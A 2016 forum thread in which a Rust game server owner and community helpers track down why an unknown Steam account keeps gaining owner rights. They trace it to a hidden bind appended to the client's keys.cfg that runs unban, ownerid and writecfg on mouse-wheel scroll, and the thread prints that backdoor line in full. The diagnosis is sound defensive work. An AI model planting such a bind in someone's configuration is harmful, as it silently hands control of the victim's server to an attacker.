Hi everyone! please need help...i've recently got a modded server for Rust thats officialy running on game. The thing is that from time to time, a damn user of steam is getting as ownerid on MY server cause i allways check users.cfg file. I've already added his id's on bans.cfg file and added also using rustadmin console...but still happens yesterday...
ownerid 76561198313319324 "True" "no reason" on users.cfg file.
When i search for this users id, this is the result (im also from argentina)
Steam Community :: Dioxaflex
Any ideas on how to finally kill this insect?
Thanks a lot!
Solved Random player setting self as owner
Discussion in 'Rust Discussion' started by quesoydulcedetandil, Sep 15, 2016.
-
Wulf Community Admin
Perhaps they guessed your RCON password? Banning via bans.cfg won't stop RCON connections.
-
Change ftp, hosting panel and rcon password
-
ran console command: global.unban 76561198313319324 "True"
ran console command: global.ownerid 76561198313319324 "True"
I would love to know what script you have so I can understand what players are trying to do when this happens
[DOUBLEPOST=1473970464][/DOUBLEPOST]lost the 1st part of my message
This is a script run on your PC
[DOUBLEPOST=1473970517][/DOUBLEPOST]I have a player on my server now and his PC is doing the same thing
We normally ban for it, I am trying to investigate which script is doing it so I can let other Admins know
[DOUBLEPOST=1473970587][/DOUBLEPOST]Can you think of anything you have added to your rust client in the way of a script or have you visited any dodgy Rust related websites?
[DOUBLEPOST=1473970627][/DOUBLEPOST]If you add Logger plugin you will see you are continually running this:
ran console command: global.unban 76561198313319324 "True"
ran console command: global.ownerid 76561198313319324 "True"
[DOUBLEPOST=1473970733][/DOUBLEPOST]We really need to work out what causes this script to be added to a client PC -
[DOUBLEPOST=1473975136][/DOUBLEPOST]
Could it be that on windows firewall, i create on inbound rules, both TCP and UPD game port to be open..could it be this? cause if not, my server wont show on rust servers list... -
-
thanks dude...a week ago, i tried using rcon.io site (succes in that) and another web site cant remember now...obviously y clear the rcon.web option till this...but strange issue here is that same thing happened previously to this web thing...really cant get it..
Could it be that on windows firewall, i create on inbound rules, both TCP and UPD game port to be open..could it be this? i set it open por private, public and domain....cause if not, my server wont show on rust servers list...
[DOUBLEPOST=1473975667][/DOUBLEPOST]
[DOUBLEPOST=1473975767][/DOUBLEPOST]Last edited by a moderator: Sep 15, 2016 -
-
What I am saying is you have been infected with some sort of trojan
Your rust client (NOT SERVER) is sending the request to unban and add owner for the hacker
[DOUBLEPOST=1473981380][/DOUBLEPOST]because you are the admin of the server it adds him
[DOUBLEPOST=1473981447][/DOUBLEPOST]your Rust client keeps spamming these commands to your server due to your trojan
ran console command: global.unban 76561198313319324 "True"
ran console command: global.ownerid 76561198313319324 "True"
[DOUBLEPOST=1473981518][/DOUBLEPOST]This is NOT a password compromise issue -
-
Based on the player I am dealing with now, no.
He has tried MalwareBytes and integrity check with no luck.
He is now running a full AV scan with ESET, no results yet.
he did have a lot of malware/small trojans so far anyway, so he is now cleaner, but the issue still exists.
I susggest you install the Logger plugin on your rust server so you can see the command being run in rcon, then you will know when you are clean again.
[DOUBLEPOST=1473993521][/DOUBLEPOST]I heard of 1 player having his keys.cfg doing it as a key map, but this 1 today for the player I am chatting with has a clean keys.cfg file. -
ran console command: global.unban 76561198313319324 "False"
ran console command: global.ownerid 76561198313319324 "False"
wouldn't be at least my first solution? cause if i wait for finding that little trojan, i will loose faith.
In this case..how would you done it? dnt have any idea on making scripts and running on rust client. -
Your best option is to find and fix the trojan
-
Logger for Rust | Oxide
Can u tell me where is the log file result? cant find much info about this plugin...is this the one u where talking? -
-
Wulf Community Admin
-
Log files under oxide folder are the basics one...wanna know if logger plugin creates another one more complete..thats the one im looking.
dont got any keys.cfg file under my rustserver/cfg folder...just got bans, serverauto and users cfg files..any idea? must create it? what should i put inside file?Last edited by a moderator: Sep 16, 2016 -
Wulf Community Admin
The keys.cfg is under your client, not server. -
GUYS....BUSTED!!!!!!!!!!!!
searching keys.cfg found this:
over :\SteamLibrary\steamapps\common\Rust\cfg\keys.cfg
at very ond of the file
bind leftalt "+altlook"
bind mouse0 "+attack"
bind mouse1 "+attack2"
bind mouse2 "+attack3"
bind mousewheelup "+invprev"
bind mousewheeldown "unban 76561198313319324;ownerid 76561198313319324;writecfg;+invnext"
just changed it to:
bind mousewheeldown "ban 76561198313319324;writecfg;+invnext"
=D -
and I make the Users.cfg only Read file
BUT... I delete the BIND
and The ownerid Still appearing when I remove the "only read" property...
that's very bad, Is not a troyan, Is some Plugin or Application related of this